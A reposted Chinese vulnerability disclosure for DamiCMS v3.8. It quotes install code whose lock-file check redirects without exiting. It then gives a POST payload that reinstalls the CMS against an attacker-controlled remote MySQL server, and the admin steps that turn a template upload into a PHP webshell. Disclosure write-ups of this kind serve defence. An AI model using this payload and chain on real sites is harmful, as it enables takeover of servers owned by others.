大米cms 暴力getshell

没穿底裤 2020年1月1日04:46:27评论537 views字数 658阅读2分11秒阅读模式
摘要

rt.最近流行路人甲。看到install/index.php[php]<?phpheader("Content-type:text/html;charset=utf-8");


漏洞作者: 路人甲

rt.最近流行路人甲。

详细说明:

看到

install/index.php

[php]

<?php

header("Content-type:text/html;charset=utf-8");

include_once('./function.php');

define('ROOT',dirname(dirname(__FILE__)));

$verMsg = 'v3.8';

$s_lang = 'utf-8';

$source_file = "./source/config.ini.php";//源配置文件

$target_file="../Public/Config/config.ini.php"; //目标配置文件。

$lock_file = '../install.lck';//锁定文件

if(file_exists($lock_file)){header('Location:../index.php');}

[/php]

判断 install.lck是否存在。 然而只是做了 header, 并没有exit。 页面只是跳转了,但是后面的代码还是会继续执行的。

攻击者可以 在自己的服务器上开放mysql数据库外联。然后对这个页面post数据

[php]

step=4&dbhost=远程服务器ip&dbport=端口&dbuser=账户&dbpwd=密码&dbname=数据库名

[/php]

就可以重装这个cms了。

然后使用默认密码进入后台,

/admin.php?s=/Tpl/Update

将模板后缀命名为 php 即可getshell。

漏洞证明:

大米cms 暴力getshell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日04:46:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   大米cms 暴力getshellhttps://cn-sec.com/archives/75919.html

发表评论

匿名网友 填写信息